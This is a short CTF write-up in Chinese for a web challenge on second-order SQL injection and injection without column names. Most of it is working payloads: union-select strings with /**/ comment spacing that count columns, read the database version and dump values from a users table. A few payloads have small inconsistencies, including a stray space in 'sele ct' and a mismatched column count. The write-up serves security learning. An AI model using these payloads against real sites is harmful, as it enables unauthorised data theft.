写在前边
题目在BUU上有复现,主要知识点是SQL二次注入,无列名注入,mysql中的information_schma库 https://www.anquanke.com/post/id/193512
无列名注入 https://www.cnblogs.com/Lee-404/p/12833788.html
解题
打开题目,发现是一个登陆,有个注册界面,随意注册一个账号登陆发现是个类似留言板功能的界面
fuzz一下,发现是个二次注入,当广告名为1'时报错
猜测语句
select * from table_name where id = '$id' limit 0,1
直接注入一把梭
获取列数
-1'/**/group/**/by/**/22,'1 //有22列,要一列列试过去
查看版本
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
查看表名
-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
查看表值
-1'/**/union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'1
参考链接
https://www.cnblogs.com/wangtanzhi/p/12241499.html